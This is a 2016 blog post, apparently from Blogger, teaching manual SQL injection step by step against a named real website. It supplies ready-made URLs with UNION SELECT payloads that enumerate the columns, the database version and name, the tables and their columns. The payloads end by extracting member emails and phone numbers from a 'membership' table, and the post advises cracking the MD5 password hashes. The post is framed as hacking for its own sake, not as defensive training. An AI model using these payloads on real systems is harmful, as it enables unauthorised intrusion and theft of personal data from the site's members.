How to hack websites using Manual SQL injection

Hello Friends, Today we are going to learn how to hack a website using Manual SQL injection.
The website which we will be using in this demo is : www.unitedpurpose.org/

So, here is the Vulnerable link : www.unitedpurpose.org/archive/article.php?id='100

So lets begin :

Step 1: First we have to find the number of columns present in the database. So to do that we have to implement the "order by" command in the vulnerable site. Example: 

http://www.unitedpurpose.org/archive/article.php?id=100 order by 7 (any no. u have to guess it, i m using 13 )

*Remember if u get error in "order by 7" that means site has less than 7 columns,if we get the same page then the no. of columns is more than 7.. In my case the number of columns are 13.

Step 2 : After getting the columns, its time to get the vulnerable column by using "UNION SELECT" no. of all columns 1 after another separated by commas(,). See the example for more clarification :

Example : http://www.unitedpurpose.org/archive/article.php?id=-100%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13--

Step 3 : In my case I got 4 and 7 as vulnerable column.(We will try with column 4). We can inject our queries in column 4 for version we can add @@version, for db database()

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12,13-- (for getting the version)

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,database(),5,6,7,8,9,10,11,12,13-- (for getting the database)

Step 4 :  Now we hav got the version as well as database name, now its time to search for the table. For that we will replace the 4 with group_concat(table_name) and add from information_schema.tables where table_schema=database(). Example :

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()--

Step 5: Now it's time for getting the columns from the User tables,we need the mysql char for this. we will replace the table_name with column_name and from information_schema.tables where table_name=mysqlchar. Just search for user and pass. Example :

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13 from information_schema.columns where table_name=CHAR(109, 101, 109, 98, 101, 114, 115, 104, 105, 112)--

Step 6 : Final step to get the username and password from the column email and pass. we will remove everything from the information_schema and will add the (user,0x3a,newpass) from user's tables. Example. Just replace email and phone with ur admin and password. U will get the password in MD5 has just decrypt it.

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,group_concat(email,0x3a,phone),5,6,7,8,9,10,11,12,13 from membership--

# Any problem in understanding or execution do comment below.
Copyright © 2016 Amar Helloween. Powered by Blogger.